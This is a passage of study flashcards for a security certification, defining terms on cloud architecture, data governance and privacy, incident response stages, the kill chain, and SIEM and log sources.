  • Application programming interface (API)—rather than placing a CASB appliance or host inline with cloud consumers and the cloud services, an API-based CASB brokers connections between the cloud service and the cloud consumer. For example, if a user account has been disabled or an authorization has been revoked on the local network, the CASB would communicate this to the cloud service and use its API to disable access there too. This depends on the API supporting the range of functions that the CASB and access and authorization policies demand. CASB solutions are quite likely to use both proxy and API modes for different security management purposes.
Term
secure web gateways (SWG)
Definition
Enterprise networks often make use of secure web gateways (SWG). An on-premises SWG is a proxy-based firewall, content filter, and intrusion detection/prevention system that mediates user access to Internet sites and services. 
Term

Next-Generation Secure Web Gateway

Definition
A next-generation SWG, as marketed by Netskope  combines the functionality of an SWG with that of data loss prevention (DLP) and a CASB to provide a wholly cloud-hosted platform for client access to websites and cloud apps. This supports an architecture defined by Gartner as secure access service edge (SASE)
Term
Definition

A software architecture where components of the solution are conceived as loosely coupled services not dependent on a single platform type or technology.

 

Term

Service-Oriented Architecture (SOA)

Definition

A software architecture where components of the solution are conceived as loosely coupled services not dependent on a single platform type or technology.

Service-oriented architecture (SOA) conceives of atomic services closely mapped to business workflows. Each service takes defined inputs and produces defined outputs. The service may itself be composed of sub-services. The key features of a service function are that it is self-contained, does not rely on the state of other services, and exposes clear input/output (I/O) interfaces. Because each service has a simple interface, interoperability is made much easier than with a complex monolithic application. The implementation of a service does not constrain compatibility choices for client services, which can use a different platform or development language. This independence of the service and the client requesting the service is referred to as loose coupling

 

Term
Microservice
Definition

A software architecture where components of the solution are conceived as highly decoupled services not dependent on a single platform type or technology.

 

Microservice-based development shares many similarities with Agile software project management and the processes of continuous delivery and deployment. It also shares roots with the Unix philosophy that each program or tool should do one thing well. The main difference between SOA and microservices is that SOA allows a service to be built from other services. By contrast, each microservice should be capable of being developed, tested, and deployed independently.

Term
orchestration 
Definition

The automation of multiple steps in a deployment process.

Orchestration can automate processes that are complex, requiring dozens or hundreds of manual steps.

Term
Simple Object Access Protocol (SOAP)
Definition

uses XML format messaging and has a number of extensions in the form of Web Services (WS) standards that support common features, such as authentication, transport security, and asynchronous messaging. SOAP also has a built-in error handling.

Term
Representational State Transfer (REST)
Definition

where SOAP is a tightly specified protocol, REST is a looser architectural framework, also referred to as RESTful APIs. Where a SOAP request must be sent as a correctly formatted XML document, a REST request can be submitted as an HTTP operation/verb (GET or POST for example). Each resource or endpoint in the API, expressed as a noun, should be accessed via a single URL.

Term

SERVERLESS ARCHITECTURE

Function as a Service (FaaS). 

Definition

A software architecture that runs functions within virtualized runtime containers in a cloud rather than on dedicated server instances.


With serverless, all the architecture is hosted within a cloud, but unlike "traditional" virtual private cloud (VPC) offerings, services such as authentication, web applications, and communications aren't developed and managed as applications running on VM instances located within the cloud. Instead, the applications are developed as functions and microservices, each interacting with other functions to facilitate client requests. When the client requires some operation to be processed, the cloud spins up a container to run the code, performs the processing, and then destroys the container.

Term
infrastructure as code (IaC).
Definition

A provisioning architecture in which deployment of resources is performed by scripted automation and orchestration.

An approach to infrastructure management where automation and orchestration fully replace manual configuration is referred to as infrastructure as code (IaC).


One of the goals of IaC is to eliminate snowflake systems. A snowflake is a configuration or build that is different from any other. 

Term
 Idempotence
Definition

In an IaC architecture, the property that an automation or orchestration action always produces the same result, regardless of the component's previous state.

By rejecting manual configuration of any kind, IaC ensures idempotence. Idempotence means that making the same call with the same parameters will always produce the same result.

 

Running scripts that have been written ad hoc is just as likely to cause environment drift as manual configuration. IaC means using carefully developed and tested scripts and orchestration runbooks to generate consistent builds.

Term
software-defined networking (SDN)
Definition

APIs and compatible hardware/virtual appliances allowing for programmable network appliances and systems.

software-defined networking (SDN) application can be used to define policy decisions on the control plane. These decisions are then implemented on the data plane by a network controller application, which interfaces with the network devices using APIs. The interface between the SDN applications and the SDN controller is described as the "northbound" API, while that between the controller and appliances is the "southbound" API. SDN can be used to manage compatible physical appliances, but also virtual switches, routers, and firewalls. 

 

Term
 network functions virtualization (NFV)
Definition

Provisioning virtual network appliances, such as switches, routers, and firewalls, via VMs and containers.

The architecture supporting rapid deployment of virtual networking using general-purpose VMs and containers is called network functions virtualization (NFV)

This architecture saves network and security administrators the job and complexity of configuring each appliance with proper settings to enforce the desired policy. It also allows for fully automated deployment (or provisioning) of network links, appliances, and servers. This makes SDN an important part of the latest automation and orchestration technologies.

 

Term
software-defined visibility (SDV)
Definition

APIs for reporting configuration and state data for automated monitoring and alerting.

Where SDN addresses secure network "build" solutions, software-defined visibility (SDV) supports assessment and incident response functions. Visibility is the near real-time collection, aggregation, and reporting of data about network traffic flows and the configuration and status of all the hosts, applications, and user accounts participating in it.

SDV can help the security data collection process by gathering statistics from the forwarding systems and then applying a classification scheme to those systems to detect network traffic that deviates from baseline levels


This can provide you with a more robust ability to detect anomalies—anomalies that may suggest an incident. SDV therefore gives you a high-level perspective of network flow and endpoint/user account behavior that may not be possible with traditional appliances. SDV supports designs such as zero trust and east/west  plus implementation of security orchestration and automated response (SOAR).

 

 

 

Term
 Fog computing
Definition

Provisioning processing resource between the network edge of IoT devices and the data center to reduce latency.

Fog computing, developed by Cisco addresses these requirements by placing fog node processing resources close to the physical location for the IoT sensors. The sensors communicate with the fog node, using Wi-Fi, ZigBee, or 4G/5G, and the fog node prioritizes traffic, analyzes and remediates alertable conditions, and backhauls remaining data to the data center for storage and low-priority analysis.

 

Term
Edge computing
Definition

Provisioning processing resource close to the network edge of IoT devices to reduce latency.


Edge devices are those that collect and depend upon data for their operation. 

Edge computing is a broader concept partially developed from fog computing and partially evolved in parallel to it. Fog computing is now seen as working within the concept of edge computing. 

Fog nodes can be incorporated as a data processing layer positioned close to the edge gateways, assisting the prioritization of critical data transmission.

Term

Information Life Cycle Management

An information life cycle model identifies discrete steps to assist security and privacy policy design. Most models identify the following general stages:

Definition

§  Creation/collectiondata may be generated by an employee or automated system, or it may be submitted by a customer or supplier. At this stage, the data needs to be classified and tagged.

§  Distribution/usedata is made available on a need to know basis for authorized uses by authenticated account holders and third parties.

§  Retentionfor regulatory reasons, data might have to be kept in an archive past the date when it is still used.

§  Disposalwhen it no longer needs to be used or retained, media storing data assets must be sanitized to remove any remnants.

Term
Privacy
Definition

Privacy is a data governance requirement that arises when collecting and processing personal data. Personal data is any information about an identifiable individual person, referred to as the data subject. Where data security controls focus on the CIA attributes of the processing system, privacy requires policies to identify private data, ensure that storage, processing, and retention is compliant with relevant regulations, limit access to the private data to authorized persons only, and ensure the rights of data subjects to review and remove any information held about them are met.

Term
data governance
Definition

The overall management of the availability, usability, and security of the information used in an organization.

data governance policy describes the security controls that will be applied to protect data at each stage of its life cycle. There are important institutional governance roles for oversight and management of information assets within the life cycle


 

Term
Data owner 
Definition

a senior (executive) role with ultimate responsibility for maintaining the confidentiality, integrity, and availability of the information asset. The owner is responsible for labeling the asset (such as determining who should have access and determining the asset's criticality and sensitivity) and ensuring that it is protected with appropriate controls (access control, backup, retention, and so forth). The owner also typically selects a steward and custodian and directs their actions and sets the budget and resource allocation for sufficient controls.

Term
Data steward 
Definition

An individual who is primarily responsible for data quality, ensuring data is labeled and identified with appropriate metadata and that data is collected and stored in a format and with values that comply with applicable laws and regulations.

 

Term
Data custodian 
Definition

An individual who is responsible for managing the system on which data assets are stored, including being responsible for enforcing access control, encryption, and backup/recovery measures.

 

Term
Data Privacy Officer (DPO) 
Definition

Institutional data governance role with responsibility for compliant collection and processing of personal and sensitive data.

this role is responsible for oversight of any personally identifiable information (PII) assets managed by the company. The privacy officer ensures that the processing, disclosure, and retention of PII complies with legal and regulatory frameworks.

 

Term
Data controller 
Definition

In privacy regulations, the entity that determines why and how personal data is collected, stored, and used.

the entity responsible for determining why and how data is stored, collected, and used and for ensuring that these purposes and means are lawful. The data controller has ultimate responsibility for privacy breaches, and is not permitted to transfer that responsibility.

 

Term
Data processor 
Definition

In privacy regulations, an entity trusted with a copy of personal data to perform storage and/or analysis on behalf of the data collector.

an entity engaged by the data controller to assist with technical collection, storage, or analysis tasks. A data processor follows the instructions of a data controller with regard to collection or processing.

 

Term
Data classification 
Definition

The process of applying confidentiality and privacy labels to information.


and typing schemas tag data assets so that they can be managed through the information life cycle. A data classification schema is a decision tree for applying one or more tags or labels to each data asset. Many data classification schemas are based on the degree of confidentiality required

Term
Public (unclassified)
Definition

there are no restrictions on viewing the data. Public information presents no risk to an organization if it is disclosed but does present a risk if it is modified or not available.

Term
Confidential (secret)
Definition

the information is highly sensitive, for viewing only by approved persons within the owner organization, and possibly by trusted third parties under NDA.

Term
Critical (top secret)
Definition

 

the information is too valuable to allow any risk of its capture. Viewing is severely restricted.

Term
proprietary information or intellectual property (IP) 
Definition

Information created by an organization, typically about the products or services that it makes or provides.

IP is an obvious target for a company's competitors, and IP in some industries (such as defense or energy) is of interest to foreign governments. IP may also represent a counterfeiting opportunity (movies, music, and books, for instance).

 

Term
Private/personal data 
Definition
information that relates to an individual identity.
Term
Sensitive
Definition
This label is typically used in the context of personal data in which privacy-sensitive information about a subject could harm them if made public and could prejudice decisions made about the subject. As defined by the EU's General Data Protection Regulations (GDPR), sensitive personal data includes religious beliefs, political opinions, trade union membership, gender, sexual orientation, racial or ethnic origin, genetic data, and health information
Term
Personally identifiable information (PII) 
Definition

Data that can be used to identify or contact an individual (or in the case of identity theft, to impersonate them).


 is data that can be used to identify, contact, or locate an individual. A Social Security Number (SSN) is a good example of PII. Others include name, date of birth, email address, telephone number, street address, biometric data, and so on. Some bits of information, such as a SSN, may be unique; others uniquely identify an individual in combination (for example, full name with birth date and street address).

Term

Customer Data 

Definition

Customer data can be institutional information, but also personal information about the customer's employees, such as sales and technical support contacts. This personal customer data should be treated as PII. Institutional information might be shared under a nondisclosure agreement (NDA), placing contractual obligations on storing and processing it securely.

 

Term
Personal health information (PHI)
Definition

Information that identifies someone as the subject of medical and insurance records, plus associated hospital and laboratory test results.

Personal health information (PHI)—or protected health information—refers to medical and insurance records, plus associated hospital and laboratory test results. PHI may be associated with a specific person or used as an anonymized or deidentified data set for analysis and research. An anonymized data set is one where the identifying data is removed completely. A deidentified set contains codes that allow the subject information to be reconstructed by the data provider.

 

Term
Financial information 
Payment Card Industry Data Security Standard (PCI DSS)
Definition

Data held about bank and investment accounts, plus information such as payroll and tax returns.

Financial information refers to data held about bank and investment accounts, plus information such as payroll and tax returns. Payment card information comprises the card number, expiry date, and the multi-digit card verification value (CVV). Cards are also associated with a PIN, but this should never be transmitted to or handled by the merchant. Abuse of the card may also require the holder's name and the address the card is registered to. The Payment Card Industry Data Security Standard (PCI DSS) defines the safe handling and storage of this information

 

Term

Government Data 

Definition

Internally, government agencies have complex data collection and processing requirements. In the US, federal laws place certain requirements on institutions that collect and process data about citizens and taxpayers. This data may be shared with companies for analysis under strict agreements to preserve security and privacy.

Term
EU's General Data Protection Regulation (GDPR)
Definition

means that personal data cannot be collected, processed, or retained without the individual's informed consent. GDPR gives data subjects rights to withdraw consent, and to inspect, amend, or erase data held about them.

Term

Privacy Notices 

Definition
Informed consent means that the data must be collected and processed only for the stated purpose, and that purpose must be clearly described to the user in plain language, not legalese. This consent statement is referred to as a privacy notice. Data collected under that consent statement cannot then be used for any other purpose. For example, if you collect an email address for use as an account ID, you may not send marketing messages to that email address without obtaining separate consent for that discrete purpose. Purpose limitation will also restrict your ability to transfer data to third parties.
Term
Purpose limitation
Definition

In data protection, the principle that personal information can be collected and processed only for a stated purpose to which the subject has consented.

 

Term

Impact Assessments 

Definition

Tracking consent statements and keeping data usage in compliance with the consent granted is a significant management task. In organizations that process large amounts of personal data, technical tools that perform tagging and cross-referencing of personal data records will be required. A data protection impact assessment is a process designed to identify the risks of collecting and processing personal data in the context of a business workflow or project and to identify mechanisms that mitigate those risks.

 

Term

 

Data Retention 

Definition

Data retention refers to backing up and archiving information assets in order to comply with business policies and/or applicable laws and regulations. To meet compliance and e-discovery requirements, organizations may be legally bound to retain certain types of data for a specified period. This type of requirement will particularly affect financial data and security log data. Conversely, storage limitation principles in privacy legislation may prevent you from retaining personal data for longer than is necessary. This can complicate the inclusion of PII in backups and archives.

Term
Data sovereignty 
Definition

In data protection, the principle that countries and states may impose individual requirements on data collected or stored within their jurisdiction.

Data sovereignty
 refers to a jurisdiction preventing or restricting processing and storage from taking place on systems which do not physically reside within that jurisdiction. Data sovereignty may demand certain concessions on your part, such as using location-specific storage facilities in a cloud service.

 

 

Term

Geographical Considerations 

Definition

Geographic access requirements fall into two different scenarios:

  • Storage locations might have to be carefully selected to mitigate data sovereignty issues. Most cloud providers allow choice of data centers for processing and storage, ensuring that information is not illegally transferred from a particular privacy jurisdiction without consent.
  • Employees needing access from multiple geographic locations. Cloud-based file and database services can apply constraint-based access controls to validate the user's geographic location before authorizing access.
Term
data breach 
Definition

When confidential or private data is read, copied, or changed without authorization. Data breach events may have notification and reporting requirements.

 

data breach occurs when information is read, modified, or deleted without authorization. "Read" in this sense can mean either seen by a person or transferred to a network or storage media. A data breach is the loss of any type of data (but notably corporate information and intellectual property), while a privacy breach refers specifically to loss or disclosure of personal and sensitive data. 

 

Term
Reputation damage
Definition
data breaches cause widespread negative publicity, and customers are less likely to trust a company that cannot secure its information assets.
Term
Identity theft
Definition
  • if the breached data is exploited to perform identity theft, the data subject may be able to sue for damages.
Term
Fines
Definition

Fines—legislation might empower a regulator to levy fines. These can be fixed sum or in the most serious cases a percentage of turnover.

 

Term
Intellectual Property Theft
Definition

loss of company data can lead to loss of revenue. This typically occurs when copyright material—unreleased movies and music tracks—is breached. The loss of patents, designs, trade secrets, and so on to competitors or state actors can also cause commercial losses, especially in overseas markets where IP theft may be difficult to remedy through legal action.

Term

Notifications of Breaches

Definition

The requirements for different types of breaches are set out in law and/or in regulations. The requirements indicate who must be notified. A data breach can mean the loss or theft of information, the accidental disclosure of information, or the loss or damage of information. Note that there are substantial risks from accidental breaches if effective procedures are not in place. If a database administrator can run a query that shows unredacted credit card numbers, that is a data breach, regardless of whether the query ever leaves the database server.

 
Term

Escalation

Definition

In the context of incident response and breach reporting, escalation is the process of involving expert and senior staff to assist in problem management.

A breach may be detected by technical staff and if the event is considered minor, there may be a temptation to remediate the system and take no further notification action. This could place the company in legal jeopardy. Any breach of personal data and most breaches of IP should be escalated to senior decision-makers and any impacts from legislation and regulation properly considered.

 

Term
 Health Insurance Portability and Accountability Act (HIPAA) 
Definition

U.S. federal law that protects the storage, reading, modification, and transmission of personal health care data.

 

Term

Public Notification and Disclosure

Definition

Other than the regulator, notification might need to be made to law enforcement, individuals and third-party companies affected by the breach, and publicly through press or social media channels. . The requirements also set out timescales for when these parties should be notified. Regulations will also set out disclosing requirements, or the information that must be provided to each of the affected parties. Disclosure is likely to include a description of what information was breached, details for the main point-of-contact, likely consequences arising from the breach, and measures taken to mitigate the breach.

Term
Service level agreement (SLA)
Definition

a contractual agreement setting out the detailed terms under which a service is provided. This can include terms for security access controls and risk assessments plus processing requirements for confidential and private data.

Term
Interconnection security agreement (ISA)
Definition

Any federal agency interconnecting its IT system to a third-party must create an ISA to govern the relationship. An ISA sets out a security risk awareness process and commit the agency and supplier to implementing security controls.

 

Term
Nondisclosure agreement (NDA)
Definition
legal basis for protecting information assets. NDAs are used between companies and employees, between companies and contractors, and between two companies. If the employee or contractor breaks this agreement and does share such information, they may face legal consequences. NDAs are useful because they deter employees and contractors from violating the trust that an employer places in them.
Term
Data sharing and use agreement 
Definition

under privacy regulations such as GDPR or HIPAA, personal data can only be collected for a specific purpose. Data sets can be subject to pseudo-anonymization or deidentification to remove personal data, but there are risks of reidentification if combined with other data sources. A data sharing and use agreement is a legal means of preventing this risk. It can specify terms for the way a data set can be analyzed and proscribe the use of reidentification techniques.

Term
Data at rest 
Definition

Information that is primarily stored on specific media, rather than moving from one medium to another.

 

Term
database encryption,  
Definition

Applying encryption at the table, field, or record level via a database management system rather than via the file system.

 

Term
Data in transit (or data in motion
Definition

Information that is being transmitted between two hosts, such as over a private network or the Internet.


this is the state when data is transmitted over a network. Examples of types of data that may be in transit include website traffic, remote access traffic, data being synchronized between cloud repositories, and more. In this state, data can be protected by a transport encryption protocol, such as TLS or IPSec. 

Term
Data in use (or data in processing
Definition

Information that is present in the volatile memory of a host, such as system memory or cache.

 

Term
data exfiltration
Definition

The process by which an attacker takes data that is stored inside of a private network and moves it to an external network.

Unauthorized copying or retrieval of data from a system is referred to as data exfiltration. Data exfiltration attacks are one of the primary means for attackers to retrieve valuable data, such as personally identifiable information (PII) or payment information, often destined for later sale on the black market

 

Term
 Data loss prevention (DLP)
Definition

A software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks.

Data loss prevention (DLP) products automate the discovery and classification of data types and enforce rules so that data is not viewed or transferred without a proper authorization

 

Term
Data minimization 
Definition

In data protection, the principle that only necessary and sufficient personal information can be collected and processed for the stated purpose.

 

Term
Data minimization 
Definition

In data protection, the principle that only necessary and sufficient personal information can be collected and processed for the stated purpose.

 

Term
 deidentification  
Definition

In data protection, methods and technologies that remove identifying information from data before it is distributed.

 

Term
 Pseudo-anonymization 
Definition

Modifying or replacing identifying personal information in a data set so that reidentification depends on an alternate data source.

 

Term
Data masking 
Definition

A deidentification method where generic or placeholder labels are substituted for real data while preserving the structure or format of the original data.

 

Data masking can mean that all or part of the contents of a field are redacted, by substituting all character strings with "x" for example. A field might be partially redacted to preserve metadata for analysis purposes. For example, in a telephone number, the dialing prefix might be retained, but the subscriber number redacted. Data masking can also use techniques to preserve the original format of the field. Data masking is an irreversible deidentification technique.

Term
Tokenization
Definition

A deidentification method where a unique token is substituted for real data.

 

Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate to the production database. An authorized query or app can retrieve the original value from the vault, if necessary, so tokenization is a reversible technique. Tokenization is used as a substitute for encryption, because from a regulatory perspective an encrypted field is the same value as the original data.

Term

Aggregation/Banding

Definition

Another deidentification technique is to generalize the data, such as substituting a specific age with a broader age band. 

Term

Hashing and Salting

Definition

A cryptographic hash produces a fixed-length string from arbitrary-length plaintext data using an algorithm such as SHA. If the function is secure, it should not be possible to match the hash back to a plaintext. Hashing is mostly used to prove integrity. If two sources have access to the same plaintext, they should derive the same hash value. Hashing is used for two main purposes within a database:

§  As an indexing method to speed up searches and provide deidentified references to records.

§  As a storage method for data such as passwords where the original plaintext does not need to be retained.

 

A salt is an additional value stored with the hashed data field. The purpose of salt is to frustrate attempts to crack the hashes. It means that the attacker cannot use pre-computed tables of hashes using dictionaries of plaintexts. These tables have to be recompiled to include the salt value.

Term

The following are the principal stages in an incident response life cycle

Definition

1.    Preparation—make the system resilient to attack in the first place. This includes hardening systems, writing policies and procedures, and setting up confidential lines of communication. It also implies creating incident response resources and procedures.

Term

The following are the principal stages in an incident response life cycle:

Identification

Definition

from the information in an alert or report, determine whether an incident has taken place, assess how severe it might be (triage), and notify stakeholders.

Term

The following are the principal stages in an incident response life cycle

Containment

Definition
limit the scope and magnitude of the incident. The principal aim of incident response is to secure data while limiting the immediate impact on customers and business partners.
Term

The following are the principal stages in an incident response life cycle:


Eradication

Definition
once the incident is contained, remove the cause and restore the affected system to a secure state by wiping a system and applying secure configuration settings.
Term

The following are the principal stages in an incident response life cycle:
Recovery

Definition
with the cause of the incident eradicated, the system can be reintegrated into the business process that it supports. Applying patches and updates to a system to help prevent future incidents is important as well. This recovery phase may involve restoration of data from backup and security testing. Systems must be monitored more closely for a period to detect and prevent any reoccurrence of the attack. The response process may have to iterate through multiple phases of identification, containment, eradication, and recovery to effect a complete resolution.
Term

The following are the principal stages in an incident response life cycle

 

Lessons learned

Definition

1.    analyze the incident and responses to identify whether procedures or systems could be improved. It is imperative to document the incident. The outputs from this phase feed back into a new preparation phase in the cycle.

Term
call list
Definition

A document listing authorized contacts for notification and collaboration during a security incident.

 

Term

Communication Plan 

Definition

Communication Plan

Secure communication between the trusted parties of the CIRT is essential for managing incidents successfully. It is imperative that adversaries not be alerted to detection and remediation measures about to be taken against them. It may not be appropriate for all members of the CSIRT to be informed about all incident details.

The team requires an "out-of-band" or "off-band" communication method that cannot be intercepted. Using corporate email or VoIP runs the risk that the adversary will be able to intercept communications. One obvious method is cell phones but these only support voice and text messaging. For file and data exchange, there should be a messaging system with end-to-end encryption, such as Off-the-Record (OTR), Signal, or WhatsApp, or an external email system with message encryption (S/MIME or PGP). These need to use digital signatures and encryption keys from a system that is completely separate from the identity management processes of the network being defended.

Term

Stakeholder Management

Definition

Trusted parties might include both internal and external stakeholders. It is not helpful for an incident to be publicized in the press or through social media outside of planned communications. Ensure that parties with privileged information do not release this information to untrusted parties, whether intentionally or inadvertently.

You need to consider obligations to report the attack. It may be necessary to inform affected parties during or immediately after the incident so that they can perform their own remediation. It may be necessary to report to regulators or law enforcement. You also need to consider the marketing and PR impact of an incident. This can be highly damaging and you will need to demonstrate to customers that security systems have been improved.

Term

INCIDENT RESPONSE PLAN

Definition

Specific procedures that must be performed if a certain type of event is detected or reported.


An incident response plan (IRP) lists the procedures, contacts, and resources available to responders for various incident categories. The CSIRT should develop profiles or scenarios of typical incidents (DDoS attack, virus/worm outbreak, data exfiltration by an external adversary, data modification by an internal adversary, and so on). This will guide investigators in determining priorities and remediation plans

Term
playbook
Definition

A checklist of actions to perform to detect and respond to a specific type of incident.

. A playbook (or runbook) is a data-driven standard operating procedure (SOP) to assist junior analysts in detecting and responding to specific cyberthreat scenarios, such as phishing attempts, SQL injection data exfiltration, connection to a block-listed IP range, and so on. The playbook starts with a SIEM report and query designed to detect the incident and identify the key detection, containment, and eradication steps to take.

Incident categories and definitions ensure that all response team members and other organizational personnel all have a common base of understanding of the meaning of terms, concepts, and descriptions. 

 

Term
Data integrity 
Definition

the most important factor in prioritizing incidents will often be the value of data that is at risk.

Term
Downtime 
Definition

another very important factor is the degree to which an incident disrupts business processes. An incident can either degrade (reduce performance) or interrupt (completely stop) the availability of an asset, system, or business process. If you have completed an asset inventory and a thorough risk assessment of business processes (showing how assets and computer systems assist each process), then you can easily identify critical processes and quantify the impact of an incident in terms of the cost of downtime.

Term
Economic/publicity 
Definition

both data integrity and downtime will have important economic effects, both in the short term and the long term. Short-term costs involve incident response itself and lost business opportunities. Long-term economic costs may involve damage to reputation and market standing

Term
Scope 
Definition

§  the scope of an incident (broadly the number of systems affected) is not a direct indicator of priority. A large number of systems might be infected with a type of malware that degrades performance, but is not a data breach risk. This might even be a masking attack as the adversary seeks to compromise data on a single database server storing top-secret information.

Term
Detection time 
Definition

§  research has shown that the existence of more than half of data breaches are not detected for weeks or months after the intrusion occurs, while in a successful intrusion, data is typically breached within minutes. This demonstrates that the systems used to search for intrusions must be thorough and the response to detection must be fast.

Term
Recovery time 
Definition
some incidents require lengthy remediation as the system changes required are complex to implement. This extended recovery period should trigger heightened alertness for continued or new attacks.
Term
kill chain
Definition

A model developed by Lockheed Martin that describes the stages by which a threat actor progresses a network intrusion.

 

Term
Reconnaissance 
Definition

in this stage the attacker determines what methods to use to complete the phases of the attack and gathers information about the target's personnel, computer systems, and supply chain.

Term
Weaponization 
Definition

the attacker couples payload code that will enable access with exploit code that will use a vulnerability to execute on the target system.

Term
Delivery 
Definition

the attacker identifies a vector by which to transmit the weaponized code to the target environment, such as via an email attachment or on a USB drive.

Term
Exploitation 
Definition

1.    the weaponized code is executed on the target system by this mechanism. For example, a phishing email may trick the user into running the code, while a drive-by-download would execute on a vulnerable system without user intervention.

Term
Installation 
Definition
this mechanism enables the weaponized code to run a remote access tool and achieve persistence on the target system.
Term
Command and control (C2 or C&C)
Definition

the weaponized code establishes an outbound channel to a remote server that can then be used to control the remote access tool and possibly download additional tools to progress the attack.

Term
Actions on objectives 
Definition
in this phase, the attacker typically uses the access achieved to covertly collect information from target systems and transfer it to a remote system (data exfiltration). An attacker may have other goals or motives, however.
Term
attack frameworks  
Definition

Models and tools used to analyze threat actor tactics, techniques, and procedures.

 

Term
 MITRE Corporation's Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) 
Definition

A knowledge base maintained by the MITRE Corporation for listing and explaining specific adversary tactics, techniques, and procedures.

 

Term
Diamond Model  
Definition

A framework for analyzing cybersecurity incidents.

[image]

Term
Tabletop 
Definition

A discussion of simulated emergency situations and security incidents.

§  this is the least costly type of training. The facilitator presents a scenario and the responders explain what action they would take to identify, contain, and eradicate the threat. The training does not use computer systems. The scenario data is presented as flashcards.

 

Term
Walkthroughs  
Definition

in this model, a facilitator presents the scenario as for a tabletop exercise, but the incident responders demonstrate what actions they would take in response. Unlike a tabletop exercise, the responders perform actions such as running scans and analyzing sample files, typically on sandboxed versions of the company's actual response and recovery tools.

 

 

Term
Simulations
Definition

 

 a simulation is a team-based exercise, where the red team attempt an intrusion, the blue team operates response and recovery controls, and a white team moderates and evaluates the exercise. This type of training requires considerable investment and planning.

Term
Disaster recovery plan
Definition

a disaster can be seen as a special class of incident where the organization's primary business function is disrupted. Disaster recovery requires considerable resources, such as shifting processing to a secondary site. Disaster recovery will involve a wider range of stakeholders than less serious incidents.

Term
Business continuity plan (BCP) 
Definition

Ensures that mission essential functions demonstrate high availability and fault tolerance so that an organization ought to continue day-to-day operations in the event of an event that causes at least one critical host, system, or network to fail.

 

OR (Security+): A policy that describes and ratifies the organization's overall business continuity strategy.

this identifies how business processes should deal with both minor and disaster-level disruption. During an incident, a system may need to be isolated. Continuity planning ensures that there is processing redundancy supporting the workflow, so that when a server is taken offline for security remediation, processing can failover to a separate system. If systems do not have this sort of planned resilience, incident response will be much more disruptive.

Term
Continuity of Operation Planning (COOP)
Definition

Continuity of Operations Planning (COOP) is a U.S. government action designed to motivate departments and people on how to address a myriad of circumstances regarding recovery and longevity during and after emergency situations. COOP plans should include alerting, identification of critical functions, personnel accountability, and establishment of an alternative location.

 

OR (Security+): A policy that describes and ratifies the organization's overall business continuity strategy.

this terminology is used for government facilities, but is functionally similar to business continuity planning. In some definitions, COOP refers specifically to backup methods of performing mission functions without IT support.

Term
 Incident response process
Definition

The incident response process emphasizes containment, eradication, and recovery. These aims are not entirely compatible with forensics.

Term
Digital forensics  
Definition

Digital forensics describes techniques to collect and preserve evidence that demonstrate that there has been no tampering or manipulation. Forensics procedures are detailed and time-consuming, where the aims of incident response are usually urgent. If an investigation must use forensic collection methods so that evidence is retained, this must be specified early in the response process.

Term
Retention policy  
Definition

Dictates for how long information needs to be kept available on backup and archive systems. This may be subject to legislative requirements.

 

Term
 first responder
Definition

The first experienced person or team to arrive at the scene of an incident.

 

Term
Correlation 
Definition

Function of log analysis that links log and state data to identify a pattern that should be logged or alerted as an event.

Correlation means interpreting the relationship between individual data points to diagnose incidents of significance to the security team. 

 

Term
dashboard 
Definition

A console presenting selected information in an easily digestible format, such as a visualization.



A SIEM dashboard provides a console to work from for day-to-day incident response. Separate dashboards can be created to suit many different purposes. An incident handler's dashboard will contain uncategorized events that have been assigned to their account, plus visualizations (graphs and tables) showing key status metrics. A manager's dashboard would show overall status indicators, such as number of unclassified events for all event handlers.

Term
Sensitivity  
Definition

One of the greatest challenges in operating a SIEM is tuning the system sensitivity to reduce false positive indicators being reported as an event. This is difficult firstly because there isn't a simple dial to turn for overall sensitivity, and secondly because reducing the number of rules that produce events increases the risk of false negatives. A false negative is where indicators that should be correlated as an event and raise an alert are ignored.

Term
Alerts 
Definition

§  Log only—an event is produced and added to the SIEM's database, but it is automatically classified.

§  Alert—the event is listed on a dashboard or incident handling system for an agent to assess. The agent classifies the event and either dismisses it to the log or escalates it as an incident.

 

§  Alarm—the event is automatically classified as critical and a priority alarm is raised. This might mean emailing an incident handler or sending a text message.

Term

Sensors 

Definition

A sensor is a network tap or port mirror that performs packet capture and intrusion detection. One of the key uses of a SIEM is to aggregate data from multiple sensors and log sources, but it might also be appropriate to configure dashboards that show output from a single sensor or source host.

Term
Trend analysis 
Definition

The process of detecting patterns within a data set over time, and using those patterns to make predictions about future events or better understand past events.

 

Term
Syslog  
Definition

A protocol enabling different appliances and software applications to transmit logs or event records to a central server.

Syslog provides an open format, protocol, and server software for logging event messages. It is used by a very wide range of host types. For example, syslog messages can be generated by Cisco routers and switches, as well as servers and workstations. It usually uses UDP port 514.

 

Term

Rsyslog and Syslog-ng

Definition

Rsyslog uses the same configuration file syntax, but can work over TCP and use a secure connection. Rsyslog can use more types of filter expressions in its configuration file to customize message handling.

Syslog-ng uses a different configuration file syntax, but can also use TCP/secure communications and more advanced options for message filtering. 

Term

journalctl

Definition

In Linux, text-based log files of the sort managed by syslog can be viewed using commands such as cattail, and head. Most modern Linux distributions now use systemd to initialize the system and to start and manage background services. Rather than writing events to syslog-format text files, logs from processes managed by systemd are written to a binary-format file called journald. Events captured by journald can be forwarded to syslog. To view events in journald directly, you can use the journalctl command to print the entire journal log, or you can issue various options with the command to filter the log in a variety of ways, such as matching a service name or only printing messages matching the specified severity level.

 

Term
NXlog 
Definition

Software optimized for multi-platform log collection and aggregation.

NXlog is an open-source log normalization tool. One principal use for it is to collect Windows logs, which use an XML-based format, and normalize them to a syslog format.

 

Term
Windows Event Logs 
Definition

§  Application—events generated by applications and services, such as when a service cannot start.

§  Security—Audit events, such as a failed logon or access to a file being denied.

§  System—events generated by the operating system and its services, such as storage volume health checks.

§  Setup—events generated during the installation of Windows.

 

§  Forwarded Events—events that are sent to the local log from other hosts.

Term

Vulnerability Scan Output 

Definition

A vulnerability scan report is another important source when determining how an attack might have been made. The scan engine might log or alert when a scan report contains vulnerabilities. The report can be analyzed to identify vulnerabilities that have not been patched or configuration weaknesses that have not been remediated. These can be correlated to recently developed exploits.

Term

Network Logs 

Definition

Network logs are generated by appliances such as routers, firewalls, switches, and access points. Log files will record the operation and status of the appliance itself—the system log for the appliance—plus traffic and access logs recording network behavior, such as a host trying to use a port that is blocked by the firewall, or an endpoint trying to use multiple MAC addresses when connected to a switch.

Term

Authentication Logs 

Definition

